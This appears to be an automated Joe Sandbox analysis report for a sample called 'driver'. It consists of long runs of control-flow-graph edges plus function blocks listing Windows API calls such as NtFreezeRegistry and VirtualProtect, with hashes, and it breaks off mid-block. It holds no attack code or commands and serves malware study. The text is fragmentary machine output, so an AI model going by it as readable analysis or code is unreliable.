4312->4313 4313->3548 4315 7ff7f4f21394 2 API calls 4314->4315 4316 7ff7f4f21567 4315->4316 4317 7ff7f4f2156c 4316->4317 4318 7ff7f4f21394 2 API calls 4316->4318 4319 7ff7f4f21394 2 API calls 4317->4319 4318->4317 4320 7ff7f4f21576 4319->4320 4321 7ff7f4f2157b 4320->4321 4322 7ff7f4f21394 2 API calls 4320->4322 4323 7ff7f4f21394 2 API calls 4321->4323 4322->4321 4324 7ff7f4f21585 4323->4324 4325 7ff7f4f2158a 4324->4325 4326 7ff7f4f21394 2 API calls 4324->4326 4327 7ff7f4f21394 2 API calls 4325->4327 4326->4325 4328 7ff7f4f21599 4327->4328 4329 7ff7f4f21394 2 API calls 4328->4329 4330 7ff7f4f215a3 4329->4330 4331 7ff7f4f215a8 4330->4331 4332 7ff7f4f21394 2 API calls 4330->4332 4333 7ff7f4f21394 2 API calls 4331->4333 4332->4331 4334 7ff7f4f215b7 4333->4334 4335 7ff7f4f21394 2 API calls 4334->4335 4336 7ff7f4f215c1 4335->4336 4337 7ff7f4f215c6 4336->4337 4338 7ff7f4f21394 2 API calls 4336->4338 4339 7ff7f4f21394 2 API calls 4337->4339 4338->4337 4340 7ff7f4f215d0 4339->4340 4341 7ff7f4f215d5 4340->4341 4342 7ff7f4f21394 2 API calls 4340->4342 4343 7ff7f4f21394 2 API calls 4341->4343 4342->4341 4344 7ff7f4f215df 4343->4344 4345 7ff7f4f215e4 4344->4345 4346 7ff7f4f21394 2 API calls 4344->4346 4347 7ff7f4f21394 2 API calls 4345->4347 4346->4345 4348 7ff7f4f215f3 4347->4348 4348->4234 4348->4238 4348->4242 4350 7ff7f4f21394 2 API calls 4349->4350 4351 7ff7f4f214ef 4350->4351 4352 7ff7f4f214f4 4351->4352 4353 7ff7f4f21394 2 API calls 4351->4353 4354 7ff7f4f21394 2 API calls 4352->4354 4353->4352 4355 7ff7f4f214fe 4354->4355 4356 7ff7f4f21394 2 API calls 4355->4356 4357 7ff7f4f21503 4356->4357 4358 7ff7f4f21394 2 API calls 4357->4358 4359 7ff7f4f21512 4358->4359 4360 7ff7f4f21394 2 API calls 4359->4360 4361 7ff7f4f21521 4360->4361 4362 7ff7f4f21530 4361->4362 4363 7ff7f4f21394 2 API calls 4361->4363 4364 7ff7f4f21394 2 API calls 4362->4364 4363->4362 4365 7ff7f4f2153a 4364->4365 4366 7ff7f4f2153f 4365->4366 4367 7ff7f4f21394 2 API calls 4365->4367 4368 7ff7f4f21394 2 API 
calls 4366->4368 4367->4366 4369 7ff7f4f2154e 4368->4369 4370 7ff7f4f21394 2 API calls 4369->4370 4371 7ff7f4f21558 4370->4371 4372 7ff7f4f2155d 4371->4372 4373 7ff7f4f21394 2 API calls 4371->4373 4374 7ff7f4f21394 2 API calls 4372->4374 4373->4372 4375 7ff7f4f21567 4374->4375 4376 7ff7f4f2156c 4375->4376 4377 7ff7f4f21394 2 API calls 4375->4377 4378 7ff7f4f21394 2 API calls 4376->4378 4377->4376 4379 7ff7f4f21576 4378->4379 4380 7ff7f4f2157b 4379->4380 4381 7ff7f4f21394 2 API calls 4379->4381 4382 7ff7f4f21394 2 API calls 4380->4382 4381->4380 4383 7ff7f4f21585 4382->4383 4384 7ff7f4f2158a 4383->4384 4385 7ff7f4f21394 2 API calls 4383->4385 4386 7ff7f4f21394 2 API calls 4384->4386 4385->4384 4387 7ff7f4f21599 4386->4387 4388 7ff7f4f21394 2 API calls 4387->4388 4389 7ff7f4f215a3 4388->4389 4390 7ff7f4f215a8 4389->4390 4391 7ff7f4f21394 2 API calls 4389->4391 4392 7ff7f4f21394 2 API calls 4390->4392 4391->4390 4393 7ff7f4f215b7 4392->4393 4394 7ff7f4f21394 2 API calls 4393->4394 4395 7ff7f4f215c1 4394->4395 4396 7ff7f4f215c6 4395->4396 4397 7ff7f4f21394 2 API calls 4395->4397 4398 7ff7f4f21394 2 API calls 4396->4398 4397->4396 4399 7ff7f4f215d0 4398->4399 4400 7ff7f4f215d5 4399->4400 4401 7ff7f4f21394 2 API calls 4399->4401 4402 7ff7f4f21394 2 API calls 4400->4402 4401->4400 4403 7ff7f4f215df 4402->4403 4404 7ff7f4f215e4 4403->4404 4405 7ff7f4f21394 2 API calls 4403->4405 4406 7ff7f4f21394 2 API calls 4404->4406 4405->4404 4407 7ff7f4f215f3 4406->4407 4407->4234 4409 7ff7f4f21394 2 API calls 4408->4409 4410 7ff7f4f214fe 4409->4410 4411 7ff7f4f21394 2 API calls 4410->4411 4412 7ff7f4f21503 4411->4412 4413 7ff7f4f21394 2 API calls 4412->4413 4414 7ff7f4f21512 4413->4414 4415 7ff7f4f21394 2 API calls 4414->4415 4416 7ff7f4f21521 4415->4416 4417 7ff7f4f21530 4416->4417 4418 7ff7f4f21394 2 API calls 4416->4418 4419 7ff7f4f21394 2 API calls 4417->4419 4418->4417 4420 7ff7f4f2153a 4419->4420 4421 7ff7f4f2153f 4420->4421 4422 7ff7f4f21394 2 API calls 4420->4422 4423 
7ff7f4f21394 2 API calls 4421->4423 4422->4421 4424 7ff7f4f2154e 4423->4424 4425 7ff7f4f21394 2 API calls 4424->4425 4426 7ff7f4f21558 4425->4426 4427 7ff7f4f2155d 4426->4427 4428 7ff7f4f21394 2 API calls 4426->4428 4429 7ff7f4f21394 2 API calls 4427->4429 4428->4427 4430 7ff7f4f21567 4429->4430 4431 7ff7f4f2156c 4430->4431 4432 7ff7f4f21394 2 API calls 4430->4432 4433 7ff7f4f21394 2 API calls 4431->4433 4432->4431 4434 7ff7f4f21576 4433->4434 4435 7ff7f4f2157b 4434->4435 4436 7ff7f4f21394 2 API calls 4434->4436 4437 7ff7f4f21394 2 API calls 4435->4437 4436->4435 4438 7ff7f4f21585 4437->4438 4439 7ff7f4f2158a 4438->4439 4440 7ff7f4f21394 2 API calls 4438->4440 4441 7ff7f4f21394 2 API calls 4439->4441 4440->4439 4442 7ff7f4f21599 4441->4442 4443 7ff7f4f21394 2 API calls 4442->4443 4444 7ff7f4f215a3 4443->4444 4445 7ff7f4f215a8 4444->4445 4446 7ff7f4f21394 2 API calls 4444->4446 4447 7ff7f4f21394 2 API calls 4445->4447 4446->4445 4448 7ff7f4f215b7 4447->4448 4449 7ff7f4f21394 2 API calls 4448->4449 4450 7ff7f4f215c1 4449->4450 4451 7ff7f4f215c6 4450->4451 4452 7ff7f4f21394 2 API calls 4450->4452 4453 7ff7f4f21394 2 API calls 4451->4453 4452->4451 4454 7ff7f4f215d0 4453->4454 4455 7ff7f4f215d5 4454->4455 4456 7ff7f4f21394 2 API calls 4454->4456 4457 7ff7f4f21394 2 API calls 4455->4457 4456->4455 4458 7ff7f4f215df 4457->4458 4459 7ff7f4f215e4 4458->4459 4460 7ff7f4f21394 2 API calls 4458->4460 4461 7ff7f4f21394 2 API calls 4459->4461 4460->4459 4462 7ff7f4f215f3 4461->4462 4462->4257 4464 7ff7f4f21394 2 API calls 4463->4464 4465 7ff7f4f214c2 4464->4465 4466 7ff7f4f214c7 4465->4466 4467 7ff7f4f21394 2 API calls 4465->4467 4468 7ff7f4f21394 2 API calls 4466->4468 4467->4466 4469 7ff7f4f214d1 4468->4469 4470 7ff7f4f214d6 4469->4470 4471 7ff7f4f21394 2 API calls 4469->4471 4472 7ff7f4f21394 2 API calls 4470->4472 4471->4470 4473 7ff7f4f214e0 4472->4473 4474 7ff7f4f214e5 4473->4474 4475 7ff7f4f21394 2 API calls 4473->4475 4476 7ff7f4f21394 2 API calls 4474->4476 4475->4474 
4477 7ff7f4f214ef 4476->4477 4478 7ff7f4f214f4 4477->4478 4479 7ff7f4f21394 2 API calls 4477->4479 4480 7ff7f4f21394 2 API calls 4478->4480 4479->4478 4481 7ff7f4f214fe 4480->4481 4482 7ff7f4f21394 2 API calls 4481->4482 4483 7ff7f4f21503 4482->4483 4484 7ff7f4f21394 2 API calls 4483->4484 4485 7ff7f4f21512 4484->4485 4486 7ff7f4f21394 2 API calls 4485->4486 4487 7ff7f4f21521 4486->4487 4488 7ff7f4f21530 4487->4488 4489 7ff7f4f21394 2 API calls 4487->4489 4490 7ff7f4f21394 2 API calls 4488->4490 4489->4488 4491 7ff7f4f2153a 4490->4491 4492 7ff7f4f2153f 4491->4492 4493 7ff7f4f21394 2 API calls 4491->4493 4494 7ff7f4f21394 2 API calls 4492->4494 4493->4492 4495 7ff7f4f2154e 4494->4495 4496 7ff7f4f21394 2 API calls 4495->4496 4497 7ff7f4f21558 4496->4497 4498 7ff7f4f2155d 4497->4498 4499 7ff7f4f21394 2 API calls 4497->4499 4500 7ff7f4f21394 2 API calls 4498->4500 4499->4498 4501 7ff7f4f21567 4500->4501 4502 7ff7f4f2156c 4501->4502 4503 7ff7f4f21394 2 API calls 4501->4503 4504 7ff7f4f21394 2 API calls 4502->4504 4503->4502 4505 7ff7f4f21576 4504->4505 4506 7ff7f4f2157b 4505->4506 4507 7ff7f4f21394 2 API calls 4505->4507 4508 7ff7f4f21394 2 API calls 4506->4508 4507->4506 4509 7ff7f4f21585 4508->4509 4510 7ff7f4f2158a 4509->4510 4511 7ff7f4f21394 2 API calls 4509->4511 4512 7ff7f4f21394 2 API calls 4510->4512 4511->4510 4513 7ff7f4f21599 4512->4513 4514 7ff7f4f21394 2 API calls 4513->4514 4515 7ff7f4f215a3 4514->4515 4516 7ff7f4f215a8 4515->4516 4517 7ff7f4f21394 2 API calls 4515->4517 4518 7ff7f4f21394 2 API calls 4516->4518 4517->4516 4519 7ff7f4f215b7 4518->4519 4520 7ff7f4f21394 2 API calls 4519->4520 4521 7ff7f4f215c1 4520->4521 4522 7ff7f4f215c6 4521->4522 4523 7ff7f4f21394 2 API calls 4521->4523 4524 7ff7f4f21394 2 API calls 4522->4524 4523->4522 4525 7ff7f4f215d0 4524->4525 4526 7ff7f4f215d5 4525->4526 4527 7ff7f4f21394 2 API calls 4525->4527 4528 7ff7f4f21394 2 API calls 4526->4528 4527->4526 4529 7ff7f4f215df 4528->4529 4530 7ff7f4f215e4 4529->4530 4531 
7ff7f4f21394 2 API calls 4529->4531 4532 7ff7f4f21394 2 API calls 4530->4532 4531->4530 4533 7ff7f4f215f3 4532->4533 4533->3888 4535 7ff7f4f21394 2 API calls 4534->4535 4536 7ff7f4f215df 4535->4536 4537 7ff7f4f215e4 4536->4537 4538 7ff7f4f21394 2 API calls 4536->4538 4539 7ff7f4f21394 2 API calls 4537->4539 4538->4537 4540 7ff7f4f215f3 4539->4540 4540->3888 4542 7ff7f4f21394 2 API calls 4541->4542 4543 7ff7f4f21495 4542->4543 4544 7ff7f4f2149a 4543->4544 4545 7ff7f4f21394 2 API calls 4543->4545 4546 7ff7f4f21394 2 API calls 4544->4546 4545->4544 4547 7ff7f4f214a4 4546->4547 4548 7ff7f4f214a9 4547->4548 4549 7ff7f4f21394 2 API calls 4547->4549 4550 7ff7f4f21394 2 API calls 4548->4550 4549->4548 4551 7ff7f4f214b3 4550->4551 4552 7ff7f4f214b8 4551->4552 4553 7ff7f4f21394 2 API calls 4551->4553 4554 7ff7f4f21394 2 API calls 4552->4554 4553->4552 4555 7ff7f4f214c2 4554->4555 4556 7ff7f4f214c7 4555->4556 4557 7ff7f4f21394 2 API calls 4555->4557 4558 7ff7f4f21394 2 API calls 4556->4558 4557->4556 4559 7ff7f4f214d1 4558->4559 4560 7ff7f4f214d6 4559->4560 4561 7ff7f4f21394 2 API calls 4559->4561 4562 7ff7f4f21394 2 API calls 4560->4562 4561->4560 4563 7ff7f4f214e0 4562->4563 4564 7ff7f4f214e5 4563->4564 4565 7ff7f4f21394 2 API calls 4563->4565 4566 7ff7f4f21394 2 API calls 4564->4566 4565->4564 4567 7ff7f4f214ef 4566->4567 4568 7ff7f4f214f4 4567->4568 4569 7ff7f4f21394 2 API calls 4567->4569 4570 7ff7f4f21394 2 API calls 4568->4570 4569->4568 4571 7ff7f4f214fe 4570->4571 4572 7ff7f4f21394 2 API calls 4571->4572 4573 7ff7f4f21503 4572->4573 4574 7ff7f4f21394 2 API calls 4573->4574 4575 7ff7f4f21512 4574->4575 4576 7ff7f4f21394 2 API calls 4575->4576 4577 7ff7f4f21521 4576->4577 4578 7ff7f4f21530 4577->4578 4579 7ff7f4f21394 2 API calls 4577->4579 4580 7ff7f4f21394 2 API calls 4578->4580 4579->4578 4581 7ff7f4f2153a 4580->4581 4582 7ff7f4f2153f 4581->4582 4583 7ff7f4f21394 2 API calls 4581->4583 4584 7ff7f4f21394 2 API calls 4582->4584 4583->4582 4585 7ff7f4f2154e 4584->4585 
4586 7ff7f4f21394 2 API calls 4585->4586 4587 7ff7f4f21558 4586->4587 4588 7ff7f4f2155d 4587->4588 4589 7ff7f4f21394 2 API calls 4587->4589 4590 7ff7f4f21394 2 API calls 4588->4590 4589->4588 4591 7ff7f4f21567 4590->4591 4592 7ff7f4f2156c 4591->4592 4593 7ff7f4f21394 2 API calls 4591->4593 4594 7ff7f4f21394 2 API calls 4592->4594 4593->4592 4595 7ff7f4f21576 4594->4595 4596 7ff7f4f2157b 4595->4596 4597 7ff7f4f21394 2 API calls 4595->4597 4598 7ff7f4f21394 2 API calls 4596->4598 4597->4596 4599 7ff7f4f21585 4598->4599 4600 7ff7f4f2158a 4599->4600 4601 7ff7f4f21394 2 API calls 4599->4601 4602 7ff7f4f21394 2 API calls 4600->4602 4601->4600 4603 7ff7f4f21599 4602->4603 4604 7ff7f4f21394 2 API calls 4603->4604 4605 7ff7f4f215a3 4604->4605 4606 7ff7f4f215a8 4605->4606 4607 7ff7f4f21394 2 API calls 4605->4607 4608 7ff7f4f21394 2 API calls 4606->4608 4607->4606 4609 7ff7f4f215b7 4608->4609 4610 7ff7f4f21394 2 API calls 4609->4610 4611 7ff7f4f215c1 4610->4611 4612 7ff7f4f215c6 4611->4612 4613 7ff7f4f21394 2 API calls 4611->4613 4614 7ff7f4f21394 2 API calls 4612->4614 4613->4612 4615 7ff7f4f215d0 4614->4615 4616 7ff7f4f215d5 4615->4616 4617 7ff7f4f21394 2 API calls 4615->4617 4618 7ff7f4f21394 2 API calls 4616->4618 4617->4616 4619 7ff7f4f215df 4618->4619 4620 7ff7f4f215e4 4619->4620 4621 7ff7f4f21394 2 API calls 4619->4621 4622 7ff7f4f21394 2 API calls 4620->4622 4621->4620 4623 7ff7f4f215f3 4622->4623 4623->3887 4624 7ff7f4f2149a 4623->4624 4625 7ff7f4f21394 2 API calls 4624->4625 4626 7ff7f4f214a4 4625->4626 4627 7ff7f4f214a9 4626->4627 4628 7ff7f4f21394 2 API calls 4626->4628 4629 7ff7f4f21394 2 API calls 4627->4629 4628->4627 4630 7ff7f4f214b3 4629->4630 4631 7ff7f4f214b8 4630->4631 4632 7ff7f4f21394 2 API calls 4630->4632 4633 7ff7f4f21394 2 API calls 4631->4633 4632->4631 4634 7ff7f4f214c2 4633->4634 4635 7ff7f4f214c7 4634->4635 4636 7ff7f4f21394 2 API calls 4634->4636 4637 7ff7f4f21394 2 API calls 4635->4637 4636->4635 4638 7ff7f4f214d1 4637->4638 4639 7ff7f4f214d6 
4638->4639 4640 7ff7f4f21394 2 API calls 4638->4640 4641 7ff7f4f21394 2 API calls 4639->4641 4640->4639 4642 7ff7f4f214e0 4641->4642 4643 7ff7f4f214e5 4642->4643 4644 7ff7f4f21394 2 API calls 4642->4644 4645 7ff7f4f21394 2 API calls 4643->4645 4644->4643 4646 7ff7f4f214ef 4645->4646 4647 7ff7f4f214f4 4646->4647 4648 7ff7f4f21394 2 API calls 4646->4648 4649 7ff7f4f21394 2 API calls 4647->4649 4648->4647 4650 7ff7f4f214fe 4649->4650 4651 7ff7f4f21394 2 API calls 4650->4651 4652 7ff7f4f21503 4651->4652 4653 7ff7f4f21394 2 API calls 4652->4653 4654 7ff7f4f21512 4653->4654 4655 7ff7f4f21394 2 API calls 4654->4655 4656 7ff7f4f21521 4655->4656 4657 7ff7f4f21530 4656->4657 4658 7ff7f4f21394 2 API calls 4656->4658 4659 7ff7f4f21394 2 API calls 4657->4659 4658->4657 4660 7ff7f4f2153a 4659->4660 4661 7ff7f4f2153f 4660->4661 4662 7ff7f4f21394 2 API calls 4660->4662 4663 7ff7f4f21394 2 API calls 4661->4663 4662->4661 4664 7ff7f4f2154e 4663->4664 4665 7ff7f4f21394 2 API calls 4664->4665 4666 7ff7f4f21558 4665->4666 4667 7ff7f4f2155d 4666->4667 4668 7ff7f4f21394 2 API calls 4666->4668 4669 7ff7f4f21394 2 API calls 4667->4669 4668->4667 4670 7ff7f4f21567 4669->4670 4671 7ff7f4f2156c 4670->4671 4672 7ff7f4f21394 2 API calls 4670->4672 4673 7ff7f4f21394 2 API calls 4671->4673 4672->4671 4674 7ff7f4f21576 4673->4674 4675 7ff7f4f2157b 4674->4675 4676 7ff7f4f21394 2 API calls 4674->4676 4677 7ff7f4f21394 2 API calls 4675->4677 4676->4675 4678 7ff7f4f21585 4677->4678 4679 7ff7f4f2158a 4678->4679 4680 7ff7f4f21394 2 API calls 4678->4680 4681 7ff7f4f21394 2 API calls 4679->4681 4680->4679 4682 7ff7f4f21599 4681->4682 4683 7ff7f4f21394 2 API calls 4682->4683 4684 7ff7f4f215a3 4683->4684 4685 7ff7f4f215a8 4684->4685 4686 7ff7f4f21394 2 API calls 4684->4686 4687 7ff7f4f21394 2 API calls 4685->4687 4686->4685 4688 7ff7f4f215b7 4687->4688 4689 7ff7f4f21394 2 API calls 4688->4689 4690 7ff7f4f215c1 4689->4690 4691 7ff7f4f215c6 4690->4691 4692 7ff7f4f21394 2 API calls 4690->4692 4693 7ff7f4f21394 
2 API calls 4691->4693 4692->4691 4694 7ff7f4f215d0 4693->4694 4695 7ff7f4f215d5 4694->4695 4696 7ff7f4f21394 2 API calls 4694->4696 4697 7ff7f4f21394 2 API calls 4695->4697 4696->4695 4698 7ff7f4f215df 4697->4698 4699 7ff7f4f215e4 4698->4699 4700 7ff7f4f21394 2 API calls 4698->4700 4701 7ff7f4f21394 2 API calls 4699->4701 4700->4699 4702 7ff7f4f215f3 4701->4702 4702->3887 4702->3892 4704 7ff7f4f21394 2 API calls 4703->4704 4705 7ff7f4f21486 4704->4705 4706 7ff7f4f2148b 4705->4706 4707 7ff7f4f21394 2 API calls 4705->4707 4708 7ff7f4f21394 2 API calls 4706->4708 4707->4706 4709 7ff7f4f21495 4708->4709 4710 7ff7f4f2149a 4709->4710 4711 7ff7f4f21394 2 API calls 4709->4711 4712 7ff7f4f21394 2 API calls 4710->4712 4711->4710 4713 7ff7f4f214a4 4712->4713 4714 7ff7f4f214a9 4713->4714 4715 7ff7f4f21394 2 API calls 4713->4715 4716 7ff7f4f21394 2 API calls 4714->4716 4715->4714 4717 7ff7f4f214b3 4716->4717 4718 7ff7f4f214b8 4717->4718 4719 7ff7f4f21394 2 API calls 4717->4719 4720 7ff7f4f21394 2 API calls 4718->4720 4719->4718 4721 7ff7f4f214c2 4720->4721 4722 7ff7f4f214c7 4721->4722 4723 7ff7f4f21394 2 API calls 4721->4723 4724 7ff7f4f21394 2 API calls 4722->4724 4723->4722 4725 7ff7f4f214d1 4724->4725 4726 7ff7f4f214d6 4725->4726 4727 7ff7f4f21394 2 API calls 4725->4727 4728 7ff7f4f21394 2 API calls 4726->4728 4727->4726 4729 7ff7f4f214e0 4728->4729 4730 7ff7f4f214e5 4729->4730 4731 7ff7f4f21394 2 API calls 4729->4731 4732 7ff7f4f21394 2 API calls 4730->4732 4731->4730 4733 7ff7f4f214ef 4732->4733 4734 7ff7f4f214f4 4733->4734 4735 7ff7f4f21394 2 API calls 4733->4735 4736 7ff7f4f21394 2 API calls 4734->4736 4735->4734 4737 7ff7f4f214fe 4736->4737 4738 7ff7f4f21394 2 API calls 4737->4738 4739 7ff7f4f21503 4738->4739 4740 7ff7f4f21394 2 API calls 4739->4740 4741 7ff7f4f21512 4740->4741 4742 7ff7f4f21394 2 API calls 4741->4742 4743 7ff7f4f21521 4742->4743 4744 7ff7f4f21530 4743->4744 4745 7ff7f4f21394 2 API calls 4743->4745 4746 7ff7f4f21394 2 API calls 4744->4746 4745->4744 
4747 7ff7f4f2153a 4746->4747 4748 7ff7f4f2153f 4747->4748 4749 7ff7f4f21394 2 API calls 4747->4749 4750 7ff7f4f21394 2 API calls 4748->4750 4749->4748 4751 7ff7f4f2154e 4750->4751 4752 7ff7f4f21394 2 API calls 4751->4752 4753 7ff7f4f21558 4752->4753 4754 7ff7f4f2155d 4753->4754 4755 7ff7f4f21394 2 API calls 4753->4755 4756 7ff7f4f21394 2 API calls 4754->4756 4755->4754 4757 7ff7f4f21567 4756->4757 4758 7ff7f4f2156c 4757->4758 4759 7ff7f4f21394 2 API calls 4757->4759 4760 7ff7f4f21394 2 API calls 4758->4760 4759->4758 4761 7ff7f4f21576 4760->4761 4762 7ff7f4f2157b 4761->4762 4763 7ff7f4f21394 2 API calls 4761->4763 4764 7ff7f4f21394 2 API calls 4762->4764 4763->4762 4765 7ff7f4f21585 4764->4765 4766 7ff7f4f2158a 4765->4766 4767 7ff7f4f21394 2 API calls 4765->4767 4768 7ff7f4f21394 2 API calls 4766->4768 4767->4766 4769 7ff7f4f21599 4768->4769 4770 7ff7f4f21394 2 API calls 4769->4770 4771 7ff7f4f215a3 4770->4771 4772 7ff7f4f215a8 4771->4772 4773 7ff7f4f21394 2 API calls 4771->4773 4774 7ff7f4f21394 2 API calls 4772->4774 4773->4772 4775 7ff7f4f215b7 4774->4775 4776 7ff7f4f21394 2 API calls 4775->4776 4777 7ff7f4f215c1 4776->4777 4778 7ff7f4f215c6 4777->4778 4779 7ff7f4f21394 2 API calls 4777->4779 4780 7ff7f4f21394 2 API calls 4778->4780 4779->4778 4781 7ff7f4f215d0 4780->4781 4782 7ff7f4f215d5 4781->4782 4783 7ff7f4f21394 2 API calls 4781->4783 4784 7ff7f4f21394 2 API calls 4782->4784 4783->4782 4785 7ff7f4f215df 4784->4785 4786 7ff7f4f215e4 4785->4786 4787 7ff7f4f21394 2 API calls 4785->4787 4788 7ff7f4f21394 2 API calls 4786->4788 4787->4786 4789 7ff7f4f215f3 4788->4789 4789->3897 4791 7ff7f4f21394 2 API calls 4790->4791 4792 7ff7f4f215d0 4791->4792 4793 7ff7f4f215d5 4792->4793 4794 7ff7f4f21394 2 API calls 4792->4794 4795 7ff7f4f21394 2 API calls 4793->4795 4794->4793 4796 7ff7f4f215df 4795->4796 4797 7ff7f4f215e4 4796->4797 4798 7ff7f4f21394 2 API calls 4796->4798 4799 7ff7f4f21394 2 API calls 4797->4799 4798->4797 4800 7ff7f4f215f3 4799->4800 4800->3898 4802 

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 2643109117-0
                                                                                • Opcode ID: fbf89af212a9236fbcd89e8a13abc7f817758a3af0e927eba919c5f762fd2f1d
                                                                                • Instruction ID: 0940f743ff760b1bb607b794f00ef9de5d21ddc33677be78854bdfd950cc2887
                                                                                • Opcode Fuzzy Hash: fbf89af212a9236fbcd89e8a13abc7f817758a3af0e927eba919c5f762fd2f1d
                                                                                • Instruction Fuzzy Hash: FE516231E1964A82F710BF27E980779A7E4BF447A0F885531C92D833E5DE3CB64183A4

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtFreezeRegistry.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F4F21156), ref: 00007FF7F4F213F7
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: FreezeRegistry
                                                                                • String ID:
                                                                                • API String ID: 2239323298-0
                                                                                • Opcode ID: 4b288eef67ca88178435c23d0b43268a82fd7f4891f0d5863e4ef906ca526c5f
                                                                                • Instruction ID: 2a6b2aafb3d05e6af68d6e8683afda983965c9b83f02ff5e346196232d7e71d7
                                                                                • Opcode Fuzzy Hash: 4b288eef67ca88178435c23d0b43268a82fd7f4891f0d5863e4ef906ca526c5f
                                                                                • Instruction Fuzzy Hash: 2EF0C971918B4183D715EF52F88042AB7A0FB98390B844939E9AC437A9DF3CE2508BA0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscatwcscpywcslen
                                                                                • String ID: $0$0$@$@
                                                                                • API String ID: 4263182637-1413854666
                                                                                • Opcode ID: 5276bf0d763aecce4044b8a0aa334820b154247cc0e08a4853e2e0c6a2717ab4
                                                                                • Instruction ID: 3197eceb88783a1d9f0bc89fb03e6c87b0e2b06af446ca9b20914f4f4f4e45ce
                                                                                • Opcode Fuzzy Hash: 5276bf0d763aecce4044b8a0aa334820b154247cc0e08a4853e2e0c6a2717ab4
                                                                                • Instruction Fuzzy Hash: 7AB1B66191CAC286E321AF25F8853AAF7A0FF91758F840235D99C426D9DF7CE246C790

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146737512.00007FF7F4F2B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146948423.00007FF7F51DE000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_26_2_7ff7f4f20000_driver.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                                • String ID: 0$X$`
                                                                                • API String ID: 329590056-2527496196
                                                                                • Opcode ID: 71ee53b50f05b73d54b70a4291a2078ad9ed205f255109c0ff1271a7e8a73095
                                                                                • Instruction ID: f44214b8ddcc9b5ac3852f8293fffeceee7cfbc0b750423b73b3e48409dce34e
                                                                                • Opcode Fuzzy Hash: 71ee53b50f05b73d54b70a4291a2078ad9ed205f255109c0ff1271a7e8a73095
                                                                                • Instruction Fuzzy Hash: 4F029522918BC182E7209F15F8443AAB7A0FB85BA4F844735DAAC477E5DF7CE185C790

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF7F4F2A53C,00007FF7F4F2A53C,?,?,00007FF7F4F20000,?,00007FF7F4F21991), ref: 00007FF7F4F21C63
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF7F4F2A53C,00007FF7F4F2A53C,?,?,00007FF7F4F20000,?,00007FF7F4F21991), ref: 00007FF7F4F21CC7
                                                                                • memcpy.MSVCRT ref: 00007FF7F4F21CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF7F4F2A53C,00007FF7F4F2A53C,?,?,00007FF7F4F20000,?,00007FF7F4F21991), ref: 00007FF7F4F21D23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001A.00000002.2146694769.00007FF7F4F21000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F4F20000, based on PE: true
                                                                                • Associated: 0000001A.00000002.2146674855.00007FF7F4F20000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 0000001A.00000002.2146714734.00007FF7F4F29000.00000002.00000001.01000000.00000004.sdmp
